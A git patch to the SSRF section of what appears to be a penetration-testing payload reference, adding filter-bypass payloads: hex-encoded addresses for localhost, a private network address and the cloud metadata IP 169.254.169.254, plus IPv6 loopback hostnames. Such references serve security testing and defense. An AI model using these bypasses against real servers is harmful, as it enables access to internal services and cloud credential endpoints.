From 2c1d30dd1e1c03a25b4d6532131bc2b2aad78c91 Mon Sep 17 00:00:00 2001
From: Anonymous ethc4 <cs7778503@gmail.com>
Date: Wed, 16 Jul 2025 11:20:25 -0400
Subject: [PATCH] Update README.md

---
 Server Side Request Forgery/README.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 6dd721dd..67de02ef 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -178,6 +178,12 @@ http://127.0.1
     http://0o177.0.0.1/ = http://127.0.0.1
     http://q177.0.0.1/ = http://127.0.0.1
     ```
+ * Hex IP
+    ```powershell
+    http://0x7f000001 = http://127.0.0.1
+    http://0xc0a80101 = http://192.168.1.1
+    http://0xa9fea9fe = http://169.254.169.254
+    ```
 
 ### Bypass Using Different Encoding
 
@@ -196,6 +202,14 @@ http://127.0.1
 
 * Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
 
+### Bypassing via ipv6 hostname
+
+* in Linux /etc/hosts contain this line `::1   localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6
+   ```powershell
+   http://ip6-localhost = ::1
+   http://ip6-loopback = ::1
+   ```
+
 ### Bypassing Using a Redirect
 
 1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)